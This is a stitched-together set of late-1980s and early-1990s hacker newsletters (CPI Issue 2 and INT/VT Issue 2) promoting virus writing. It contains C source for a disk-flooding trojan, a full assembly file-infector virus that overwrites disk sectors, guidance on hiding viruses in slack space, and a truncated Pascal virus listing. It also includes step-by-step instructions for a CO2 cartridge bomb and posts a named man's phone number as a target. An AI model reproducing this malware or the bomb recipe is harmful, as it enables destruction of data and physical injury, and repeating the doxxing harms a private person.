[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@ @@@@ @@@@ @@@@ @@@ * * @@@ @@@ @@@@ @@@ * * @@@ @@@@@@@@@@@@@@@ @@@ * * @@@ @@@@@@@@@@@@@@ @@@ * * @@@ @@@ @@@ * * @@@@ @@@@ @@@ @@@ * * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * C O R R U P T E D P R O G R A M M I N G I N T E R N A T I O N A L presents: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ Virili And Trojan Horses @ @ @ @ A ProtagonistYs Point Of View @ @ @ @ Issue #2 @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ DISCLAIMER::All of the information contained in this newsletter reflects the thoughts and ideas of the authors, not their actions. The sole purpose of this document is to educate and spread information. Any illegal or illicit action is not endorsed by the authors or CPI. The authors and CPI are not responsible for any information which may present itself as old or mis-interpreted, and actions by the reader. Remember, ZJust Say No!Y CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Introduction To CPI#2 --------------------- Well, here is the olong awaited@ second issue of CPI, A ProtagonistYs Point of view. This issue should prove a bit interesting, I dunno, but at least entertaining for the time it takes to read. Enjoy the information and donYt forget the disclaimer. Oh yes, if you have some interesting articles or an application to send us, just see the BBS list at the end of this document. Thanx. All applications and information will be voted on through the CPI Inner Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe... Until our next issue, (which may be whenever), good-bye. Doctor Dissector Table of Contents ----------------- Part Title Author ----------------------------------------------------------------------------- 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak 2.3 V-IDEA-1.............................................. Ashton Darkside 2.4 V-IDEA-2.............................................. Ashton Darkside 2.5 The Generic Virus..................................... Doctor Dissector 2.6 Aids.................................................. Doctor Dissector 2.7 Batch File Virus...................................... PHUN 3.2 2.8 Basic Virus......................................... PHUN 3.2 2.9 The Alemeda Virus..................................... PHUN 4.3 2.10 Virili In The News.................................... Various Sources 2.11 Application For CPI................................... CPI Inner Circle (CPI Node Phone #Ys Are In 2.11) ========================================================================= Subject: INTVT Issue 2 1/1 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" The International Network of Thieves 2/16/91 Virus and Trojan Oriented Volume No. 2 Welcome back! Hey guys, (and gals I hope!) error in last issue, the date was incorrect. The actual date of INT/VT1.TXT should have been 1/29/91. Sorry dudez, had some people think it was a year old... Ok, geez, already issue two? You people have been waiting for it haven't you? GOOD! VERY IMPORTANT NEWS! -------------------- Gene Dunn, (handle is Unimax) a PD'er and Virus hater is on the prowl. He has called The Edge of Destruction(817-473-3621) many times, and actually came over to MY house once. He is threatening to take me to court. He got a virus on his PD BBS and wants The EoD shut down because of its virus support, and because it is the home of INT/VT!!!! This man is a mad man. I won't take the BBS down! But if the court says so, oh well! HEY! THIS GUY IS THREATENING THE HOME OF INT/VT!!! His name again is GENE DUNN,(Actually Eugene I believe) and the number to his BBS is 817-834-0143. What you do with that info is up to you. DISCLAIMER ---------- The writers of this article, nor the sysops of The EoD, are responsible for what you do with the information found/discussed here. You the user/reader of this are soley responsible for what you do with this information, as it is provided for programming research only, and not for ANY illegal uses. HOW WAS LESSON ONE? ------------------- How did everyone do on your first lesson? Did you try it? On what? I'd really enjoy it if you'd call The EoD and leave me mail about it. Also, if you plan to continue with these issues and do the examples, I would recommend that you get a copy of flushot(also available on The EoD), so as to watch the virii/trojans as they work. INT/VT APPLICATION ------------------ In this issue of INT/VT we will be including an application for joining our association. Please fill it out and upload it to the SYSOP UPLOADS on The Edge of Destruction BBS, 817-473-3621. You will be notified via E-Mail of your status as a member. Thank You. SOME INFORMATION ABOUT DEBUG ---------------------------- Since not everyone has Turbo Debugger, sNOOp, or some of the nicer de-buggers, we're going to stick with using the DOS debug. Those of you who already write virii and or are familiar with debug, you may want to skip this section and pick up later down in the article. This is for the beginners to debug. Here are some of the basic listing of commands for debug: COMMAND / USAGE / COMMENTS A A[address] A0100:0100 Start assembling at address 0100:0100 In most cases A0100 is all that is neccessary. C C[range address] CC100,1FF 300 Compare portion of memory D D[range] D0100 Displays the contents of memory at 0100 E E[address] E0100 Start entering byte values at 0100 F F[range list] F0100 L 100 fill 100 bytes G G[address] G runs the current program H H[values] H 100 108 ads and subtracts hex numbers I I[value] I2F8 input one byte from port specified L L[address] Load M M[range address] move blocks of memory N N[name] Names file (i.e. N Joe.exe) O O[value byte] sends specified byte to output port Q Q TermÐminates Debug R R[register] Shows the register and edit it S S[range list] Search the specified range for bytes T T Trace through program U U[address] Unnassemble at address x, u0100 W W[amt. of bytes] Save to disk While these are not explained in great detail, it is not neccessary to do so at this time, but as we use them it will be. I recommend you go to the bookstore and purchase Peter Norton's Guide to Assembly Language. It will run you about $25.00 and then download MASM5.0 from The EoD. MASM stand for Microsoft Assembler, for you who are new to this. Also available are Turbo C and Turbo C++ v2.00 and Turbo Pascal v6.00. Feel free to call and D/L these files. Reading Peter Norton's book will make what you find here much easier. Also, it will teach you how to program in assembler. Something we DO NOT plan to do here, but to sharpen your knowledge, or HELP you learn it. Something else you need is the BOOK of INT's. Soon to be available on The EoD. LESSON 2, ANOTHER SIMPLE TROJAN IN C ------------------------------------ Our last trojan was in ASM, this one is in C. And known as Crazy. What it does is makes tons of directories on someones HD. You say, "ooo, big deal." Exactly, its a VERY BIG deal. In DOS, you can not remove more than one DIR at a time. Can you imagine removing all of those DIR's by hand? It could take weeks, months, or years. /* Thanks to Ninja Wala of SUP for writing such a niftey trojan! */ #include #include /* Include Files */ #include /* Used by C to make life easier */ main() { int i,j; /* Names I and J as variables */ char tmp[20]; char far *ptr; for (i=0;i<=50;i++){ /* random loop to make dirs */ srand(rand()); ptr = itoa(rand(),tmp,10); mkdir ( ptr ); /* makes the DIR */ chdir ( ptr ); for (j=0;j<=50;j++){ ptr = itoa(rand(),tmp,10); mkdir( ptr ); } chdir ("\\"); } } While we are not going deep into how this works, we give you the source so you can compile it and have some real nice fun killing an HD. If you would like the compiled version (EXE version) you can get it off of many BBS's including The EoD. NEXT ISSUE ---------- In the next issue we will actually look at the inner workings of a virus. Rather than a trojan. As to which virus, we can not be sure at this time. Also, we will start our virus description and fake virus section. JUST FOR ANARCHISTS - CO2 Cartidge Bomb! ---------------------------------------- Ok dudez, here is a nice mailbox or toilet bomb. Let the air out of the CO2 cartridge, I don't care how. Use a nail, knife, screwdriver, or whatever else to make the hole a bit bigger. Fill it with gunpowder and pack it down by tapping the bottom of the CO2 cartridge on a hard surface. Insert a fuse, (I recommend a good waterproof cannon fuse, but a firecracker fuse will work if its all you can find.) Use something that seals real hard and tight. I have used silicon before, but I think you cand find something that will try much harder if you look. Find your destination. Light it. RUN! FAST! If it blows with you near it. Better be a hospital near. I flushed one down a toilet at a Fina Station and the Toilet CRACKED and started leaking. Not to mention water was everywhere! Dripping from the ceiling and the walls. CALL OUR HOME WORLD ------------------- Call our HQ BBS: The Edge of Destruction - 817-473-3621 APOLOGY ------- We realize that this issue was not as informative as some of you were hoping. The reason for this is the problem of Gene Dunn. We have had little or no time to donate to INT/VT due to his insanity. We hope to have a MUCH, MUCH more interesting Issue as Issue 3. Which you should see in about 1-2 weeks. Subject: CPI Issue 2 2/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" [2.2] Explanation of Viruses and Trojans Horses ----------------------------------------- Written by Acid Phreak Like itYs biological counterpart, a computer virus is an agent of infection, insinuating itself into a program or disk and forcing its host to replicate the virus code. Hackers fascinated by the concept of oliving@ code wrote the first viruses as projects or as pranks. In the past few years, however, a different kind of virus has become common, one that lives up to an earlier meaning of the word: in Latin, virus means poison. These new viruses incorporate features of another type of insidious program called a Trojan horse. Such a program masquerades as a useful utility or product but wreaks havoc on your system when you run it. It may erase a few files, format your disk, steal secrets--anything software can do, a Trojan horse can do. A malicious virus can do all this then attempt to replicate itself and infect other systems. The growing media coverage of the virus conceptand of specific viruse has promoted the development of a new type of software. Antivirus programs, vaccines--they go by many names, but their purpose is to protect from virus attack. At present there are more antivirus programs than known viruses (not for long). Some experts quibble about exactly what a virus is. The most widely known viruses, the IBM Xmas virus and the recent Internet virus, are not viruses according to some experts because they do not infect other programs. Others argue that every Trojan horse is a virus--one that depends completely on people to spread it. How They Reproduce: ------------------- Viruses canYt travel without people. Your PC will not become infected unless someone runs an infected program on it, whether accidentally or on purpose. PCYs are different from mainframe networks in this way--the mainframe Internet virus spread by transmitting itself to other systems and ordering them to execute it as a program. That kind of active transmission is not possible on a PC. Virus code reproduces by changing something in your system. Some viruses strike COMMAND.COM or the hidden system files. Others, like the notorious Pakistani-Brain virus, modify the boot sector of floppy disks. Still others attach themselves to any .COM or .EXE file. In truth, any file on your system that can be executed--whether itYs a program, a device driver, an overlay, or even a batch file--could be the target of a virus. When an infected program runs, the virus code usually executes first and then transfers control to the original program. The virus may immediately infect other programs, or it may load itself into RAM and continue spreading. If the virus can infect a file that will be used on another system, it has succeeded. What They Can Do: ----------------- Viruses go through two phases: a replication phase and an action phase. The action doesnYt happen until a certain even occurs--perhaps reaching a special date or running the virus a certain number of times. It wouldnYt make sense for a virus to damage your system the first time it ran; it needs some time to grow and spread first. The most vulnerable spot for a virus attack is your hard diskYs file allocation table (FAT). This table tells DOS where every fileYs data resides on the disk. Without the FAT, the dataYs still there but DOS canYt find it. A virus could also preform a low-level format on some or all the tracks of your hard disk, erase all files, or change the CMOS memory on AT-class computers so that they donYt recognize the hard disk. Most of the dangers involve data only, but itYs even possible to burn out a monochrome monitor with the right code. Some virus assaults are quite subtl. One known virus finds four consecutive digits on the screen and switches two. LetYs hope youYre not balancing the companyYs books when this one hits. Others slow down system operations or introduce serious errors. Subject: CPI Issue 2 3/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" [2.3] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ oWe ainYt the phucking Salvation Army.@ ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * oOk, IYve written the virus, now where the hell do I put it?@ By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we ojust say no@ to doing it. ******************************************************************************* Ok, wow! YouYve just invented the most incredibly nifty virus. It slices, it dices, it squshes, it mushes (sorry Berke Breathed) peopleYs data! But the only problem is, if you go around infecting every damn file, some cute software company is going to start putting in procedures that checksum their warez each time they run, which will make life for your infecting virus a total bitch. Or somebodyYs going to come up with an incredibly nifty vaccination util that will wipe it out. Because, i mean, hey, when disk space starts vanishing suddenly in 500K chunks people tend to notice. Especially people like me that rarely have more than 4096 bytes free on their HD anyway. Ok. So youYre saying owow, so what, I can make mine fool-proof@, etc, etc. But wait! ThereYs no need to go around wasting your precious time when the answer is right there in front of you! Think about it, you could be putting that time into writing better and more inovative viruses, or you could be worring about keeping the file size, the date & time, and the attributes the same. With this system, you only need to infect one file, preferably one thatYs NOT a system file, but something that will get run alot, and will be able to load your nifty virus on a daily basis. This system also doesnYt take up any disk space, other than the loader. And the loader could conceivably be under 16 bytes (damn near undetectable). First of all, you need to know what programs to infect. Now, everybody knows about using COMMAND.COM and thatYs unoriginal anyway, when there are other programs people run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get the idea. Better still are dos commands like Format, Link or even compression utilities. But you get the point. Besides, whoYs going to miss 16 bytes, right? Now, the good part: where to put the damn thing. One note to the programmer: This could get tricky if your virus is over 2k or isnYt written in Assembly, but the size problem is easy enough, it would be a simple thing to break your virus into parts and have the parts load each other into the system so that you do eventually get the whole thing. The only problem with using languages besides assembly is that itYs hard to break them up into 2k segments. If you want to infect floppys, or smaller disks, youYd be best off to break your file into 512 byte segments, since theyYre easier to hide. But, hey, in assembly, you can generate pretty small programs that do alot, tho. Ok, by now youYve probably figured out that weYre talking about the part of the disk called Zthe slackY. Every disk that your computer uses is divided up into parts called sectors, which are (in almost all cases) 512 bytes. But in larger disks, and even in floppies, keeping track of every single sector would be a complete bitch. So the sectors are bunched together into groups called ZclustersY. On floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard disks, theyYre typically 4096 bytes, or eight sectors. Now think about it, you have programs on your hard disk, and what are the odds that they will have sizes that always end up in increments of 4096? If IYve lost you, think of it this way: the file takes up a bunch of clusters, but in the last cluster it uses, there is usually some ZslackY, or space that isnYt used by the file. This space is between where the actual file ends and where the actual cluster ends. So, potentially, you can have up to 4095 bytes of ZslackY on a file on a hard disk, or 1023 bytes of ZslackY on a floppy. In fact, right now, run the Norton program ZFS /S /TY command from your root directory, and subtract the total size of the files from the total disk space used. ThatYs how much ZslackY space is on your disk (a hell of alot, even on a floppy). To use the slack, all you need to do is to find a chunk of slack big enough to fit your virus (or a segment of your virus) and use direct disk access (INT 13) to put your virus there. There is one minor problem with this. Any disk write to that cluster will overwrite the slack with ZgarbageY from memory. This is because of the way DOS manages itYs disk I/O and it canYt be fixed without alot of hassles. But, there is a way around even this. And it involves a popular (abeit outdated and usually ineffectual) form of virus protection called the READ-ONLY flag. This flag is the greatest friend of this type of virus. Because if the file is not written to, the last cluster is not written to, and voila! Your virus is safe >from mischivious accidents. And since the R-O flag doesnYt affect INT 13 disk I/O, it wonYt be in your way. Also, check for programs with the SYSTEM flag set because that has the same Read-only effect (even tho I havenYt seen it written, itYs true that if the file is designated system, DOS treats it as read-only, whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so I am told; IYve been too lazy to find out myself) or a protected (!) COMMAND.COM file in either type of DOS would be ideal for this. All you have to do is then insert your loader into some innocent-looking file, and you are in business. All your loader has to do is read the sector into the highest part of memory, and do a far call to it. Your virus cann then go about waiting for floppy disks to infect, and place loaders on any available executable file on the disk. Sound pretty neet? It is! Anyway, have fun, and be sure to upload your virus, along with a README file on how it works to CPI Headquarters so we can check it out! And remember: donYt target P/H/P boards (thatYs Phreak/Hack/Pirate boards) with ANY virus. Even if the Sysop is a leech and you want to shove his balls down his throat. Because if all the PHP boards go down (especially members of CPI), who the hell can you go to for all these nifty virus ideas? And besides, itYs betraying your own people, which is uncool even if you are an anarchist. So, target uncool PD boards, or your bossYs computer or whatever, but donYt attack your friends. Other than that, have phun, and phuck it up! Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applicaitons Network (SATAN) Corrupted Programmers International (CPI) PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). Call these boards because the sysops are cool: Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) System: Utopia (SATAN HQ) Sysop: RobbinY Hood (SATAN leader) The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) The Jolly BardsmenYs Pub & Tavern The Sierra Crib The Phrozen Phorest Knight ShadowYs Grotto And if I forgot your board, sorry, but donYt send me E-mail bitching about it! Subject: CPI Issue 2 4/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" [2.4] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ oWe ainYt the phucking Salvation Army.@ ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * CPI Virus Standards - Protect yourself and your friends By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we ojust say no@ to doing it. ******************************************************************************* One of the main problems with viruses is that once you set one loose, it is no longer under your control. I propose to stop this by introducing some standards of virus writing that will enable them to be deactivated whenever they enter a ZfriendlyY (CPI) system. In the long run, even the author of the virus is not immune to being attacked. The following are what I have termed the CPI standards for writing viruses. They will allow a virus to easily check any system they are being run on for a type of Zidentity badgeY. If it is found, the virus will not infect the system it is being run on. The other standards are mostly written around this. CPI Standards for writing viruses - 1 - The virus will have an Zactive periodY and an Zinactive periodY. The active periods will be no more than one year in length (to make it more difficult to discover the virus). You may release different versions of your virus with different Zactive periodsY. It is not recommended that your virus deactivate itself after the set active period, as this would enable people to deactivate viruses by using their computer with the date set to 2069 or something. It is also required that activation periods begin on January 1 and end on December 31. This will coincide with the changing identity codes. 2 - The virus will check for an identity code by executing Interrrupt 12h with the following register settings: AX - 4350, BX - 4920, CX - AB46, DX - 554E. If the system is friendly, then a pointer will be returned in CX:DX to an ASCIIZ (0-terminated) string which will have different contents in different years. The codes are not to be included in any text file, and should only be given through E-mail on CPI affiliated systems. You can always ask me by sending me mail at The Andromeda Strain BBS. If a system is detected as friendly, the virus will not attempt to infect or damage it, but it is ok to display a little greeting message about how lucky the user was. 3 - We very much encourage you to upload your virus, along with a breif description on the workings into the CPI section at The Andromeda Strain BBS. Only CPI members will know about your virus. This is so that CPI members can share techniques and it also allows us to verify that the identity check works. If we see any improvements that could be made, such as ways to streamline code, better ways of spreading, etc. we will inform you so that you can make the changes if you wish. 4 - It is also suggested that you use ADS standard for virus storage on infected disks. This meathod uses disk slack space for storage and is more thoroughly described in a previous text file by me. I think that this is the most effective and invisible way to store viruli. 5 - A list of CPI-Standard viruli will be avaliable at all times from The Andromeda Strain BBS, to CPI users. Identity strings will also be available to anyone in CPI, or anyone who uploads source code to a virus which is 100% complete except for the Identity string (it must be written to CPI-Standards). Non-CPI members who do this will be more seriously considered for membership in CPI. Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applications Network (SATAN) Corrupted Programmers International (CPI) PS: This file (by itself) has approx 2.5k of slack. Subject: CPI Issue 2 5/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" ;============================================================================= ; ; C*P*I ; ; CORRUPTED PROGRAMMING INTERNATIONAL ; ----------------------------------- ; p r e s e n t s ; ; T H E ; _ _ ; (g) GENERIC VIRUS (g) ; ^ ^ ; ; ; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF ; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT ; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR oPROGRAM TO BIG TO ; FIT IN MEMORY@ THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. ; ; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON ; THE DISK. HAVE PHUN WITH THIS ONE. ; ; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE ; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. ; ; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE ; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF ; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR ; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. ; ; DOCTOR DISSECTOR ; CPI ASSOCIATES ; ;============================================================================= MAIN: NOP ;| Marker bytes that identify this program NOP ;| as infected/a virus NOP ;| MOV AX,00 ;| Initialize the pointers MOV ES:[POINTER],AX ;| MOV ES:[COUNTER],AX ;| MOV ES:[DISKS B],AL ;| MOV AH,19 ;| Get the selected drive (dir?) INT 21 ;| MOV CS:DRIVE,AL ;| Get current path (save drive) MOV AH,47 ;| (dir?) MOV DH,0 ;| ADD AL,1 ;| MOV DL,AL ;| (in actual drive) LEA SI,CS:OLD_PATH ;| INT 21 ;| MOV AH,0E ;| Find # of drives MOV DL,0 ;| INT 21 ;| CMP AL,01 ;| (Check if only one drive) JNZ HUPS3 ;| (If not one drive, go the HUPS3) MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive LEA BX,SEARCH_ORDER ;| ADD BX,AX ;| ADD BX,0001 ;| MOV CS:POINTER,BX ;| CLC ;| CHANGE_DISK: ;| Carry is set if no more .COM files are JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be MOV AH,17 ;| renamed to .COM (change .EXE to .COM) LEA DX,CS:MASKE_EXE ;| but will cause the error message oProgram INT 21 ;| to large to fit in memory@ when starting CMP AL,0FF ;| larger infected programs JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) MOV AH,2CH ;| If neither .COM or .EXE files can be found, INT 21 ;| then random sectors on the disk will be MOV BX,CS:POINTER ;| overwritten depending on the system time MOV AL,CS:[BX] ;| in milliseconds. This is the time of the MOV BX,DX ;| complete oinfection@ of a storage medium. MOV CX,2 ;| The virus can find nothing more to infect MOV DH,0 ;| starts its destruction. INT 26 ;| (write crap on disk) NO_NAME_CHANGE: ;| Check if the end of the search order table MOV BX,CS:POINTER ;| has been reached. If so, end. DEC BX ;| MOV CS:POINTER,BX ;| MOV DL,CS:[BX] ;| CMP DL,0FF ;| JNZ HUPS2 ;| JMP HOPS ;| HUPS2: ;| Get a new drive from the search order table MOV AH,0E ;| and select it, beginning with the ROOT dir. INT 21 ;| (change drive) MOV AH,3B ;| (change path) LEA DX,PATH ;| INT 21 ;| JMP FIND_FIRST_FILE ;| FIND_FIRST_SUBDIR: ;| Starting from the root, search for the MOV AH,17 ;| first subdir. First, (change .exe to .com) LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the INT 21 ;| old directory. MOV AH,3B ;| (use root directory) LEA DX,PATH ;| INT 21 ;| MOV AH,04E ;| (search for first subdirectory) MOV CX,00010001B ;| (dir mask) LEA DX,MASKE_DIR ;| INT 21 ;| JC CHANGE_DISK ;| MOV BX,CS:COUNTER ;| INC BX ;| DEC BX ;| JZ USE_NEXT_SUBDIR ;| FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more MOV AH,4FH ;| are found, the (search for next subdir) INT 21 ;| drive will be changed. JC CHANGE_DISK ;| DEC BX ;| JNZ FIND_NEXT_SUBDIR ;| USE_NEXT_SUBDIR: MOV AH,2FH ;| Select found directory. (get dta address) INT 21 ;| ADD BX,1CH ;| MOV ES:[BX],W@\@ ;| (address of name in dta) INC BX ;| PUSH DS ;| MOV AX,ES ;| MOV DS,AX ;| MOV DX,BX ;| MOV AH,3B ;| (change path) INT 21 ;| POP DS ;| MOV BX,CS:COUNTER ;| INC BX ;| MOV CS:COUNTER,BX ;| FIND_FIRST_FILE: ;| Find first .COM file in the current dir. MOV AH,04E ;| If there are none, (Search for first) MOV CX,00000001B ;| search the next directory. (mask) LEA DX,MASKE_COM ;| INT 21 ;| JC FIND_FIRST_SUBDIR ;| JMP CHECK_IF_ILL ;| FIND_NEXT_FILE: ;| If program is ill (infected) then search MOV AH,4FH ;| for another. (search for next) INT 21 ;| JC FIND_FIRST_SUBDIR ;| CHECK_IF_ILL: ;| Check if already infected by virus. MOV AH,3D ;| (open channel) MOV AL,02 ;| (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| (save channel) MOV AH,3FH ;| (read file) MOV CH,BUFLEN ;| MOV DX,BUFFER ;| (write in buffer) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV BX,CS:[BUFFER] ;| (look for three NOPYs) CMP BX,9090 ;| JZ FIND_NEXT_FILE ;| MOV AH,43 ;| This section by-passes (write enable) MOV AL,0 ;| the MS/PC DOS Write Protection. MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV AH,43 ;| MOV AL,01 ;| AND CX,11111110B ;| INT 21 ;| MOV AH,3D ;| Open file for read/write (open channel) MOV AL,02 ;| access (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| Read date entry of program and (channel) MOV AH,57 ;| save for future use. (get date) MOV AL,0 ;| INT 21 ;| PUSH CX ;| (save date) PUSH DX ;| MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) MOV CS:[JMPBUF],DX ;| the program will be saved for future use. MOV DX,CS:[BUFFER+1] ;| (save new jump) LEA CX,CONT-100 ;| SUB DX,CX ;| MOV CS:[CONTA],DX ;| MOV AH,57 ;| The virus now copies itself to (write date) MOV AL,1 ;| to the start of the file. POP DX ;| POP CX ;| (restore date) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus MOV CS:[CONTA],DX ;| at address oCONTA@ the jump which was at the ;| start of the program. This is done to HOPS: ;| preserve the executability of the host NOP ;| program as much as possible. After saving, CALL USE_OLD ;| it still works with the jump address in the ;| virus. The jump address in the virus differs ;| from the jump address in memory CONT DB 0E9 ;| Continue with the host program (make jump) CONTA DW 0 ;| MOV AH,00 ;| INT 21 ;| USE_OLD: MOV AH,0E ;| Reactivate the selected (use old drive) MOV DL,CS:DRIVE ;| drive at the start of the program, and INT 21 ;| reactivate the selected path at the start MOV AH,3B ;| of the program.(use old drive) LEA DX,OLD_PATH-1 ;| (get old path and backslash) INT 21 ;| RET ;| SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF POINTER DW 0000 ;| (pointer f. search order) COUNTER DW 0000 ;| (counter f. nth. search) DISKS DB 0 ;| (number of disks) MASKE_COM DB o*.COM@,00 ;| (search for com files) MASKE_DIR DB o*@,00 ;| (search for dirYs) MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB DB 0,@????????EXE@,0,0,0,0 DB 0,@????????COM@,0 MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB DB 0,@???????????@,0,0,0,0 DB 0,@????????COM@,0 BUFFER EQU 0E00 ;| (a safe place) BUFLEN EQU 208H ;| Length of virus. Modify this accordingly ;| if you modify this source. Be careful ;| for this may change! JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) PATH DB o\@,0 ;| (first place) DRIVE DB 0 ;| (actual drive) BACK_SLASH DB o\@ OLD_PATH DB 32 DUP (?) ;| (old path) Subject: CPI Issue 2 6/11 To: tk0jut2 Original_To: BITNET%"tk0jut2@niu" [2.6] +-------------------------------+ +--------------------------------------+ | | P | | | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | | @@ @@ @@ @@ | R | # # # # # # | | @@ @@ @@ @@ | * | ##### # # # ##### | | @@ @@@@@@@@ @@ | E | # # # # # # | | @@ @@ @@ | * | # # ##### #### ##### | | @@ @@ @@ | S | | | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ | | E | A NEW AND IMPROVED VIRUS FOR | +-------------------------------+ * | PC/MS DOS MACHINES | | C O R R U P T E D | N +--------------------------------------+ | | * | CREATED BY: DOCTOR DISSECTOR | | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| | | * | AUTHOR NOT RESPONSIBLE FOR READERS | | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| +-------------------------------+ +--------------------------------------+ Well well, here it is... I call it AIDS... It infects all COM files, but it is not perfect, so it will also change the date/time stamp to the current system. Plus, any READ-ONLY attributes will ward this virus off, it doesnYt like them! Anyway, this virus was originally named NUMBER ONE, and I modified the code so that it would fit my needs. The source code, which is included with this neato package was written in Turbo Pascal 3.01a. Yeah I know itYs old, but it works. Well, I added a few things, you can experiment or mess around with it if youYd like to, and add any mods to it that you want, but change the name and give us some credit if you do. The file is approximately 13k long, and this extra memory will be added to the file it picks as host. If no more COM files are to be found, it picks a random value from 1-10, and if it happens to be the lucky number 7, AIDS will present a nice screen with lots of smiles, with a note telling the operator that their system is now screwed, I mean permanantly. The files encrypted containing AIDS in their code are IRREVERSIBLY messed up. Oh well... Again, neither CPI nor the author of Number One or AIDS endorses this document and program for use in any illegal manner. Also, CPI, the author to Number One and AIDS is not responsible for any actions by the readers that may prove harm in any way or another. This package was written for EDUCATIONAL purposes only! { Beginning of source code, Turbo Pascal 3.01a } {C-} {U-} {I-} { Wont allow a user break, enable IO check } { -- Constants --------------------------------------- } Const VirusSize = 13847; { AIDSYs code size } Warning :String[42] { Warning message } = ZThis File Has Been Infected By AIDS! HaHa!Y; { -- Type declarations------------------------------------- } Type DTARec =Record { Data area for file search } DOSnext :Array[1..21] of Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: 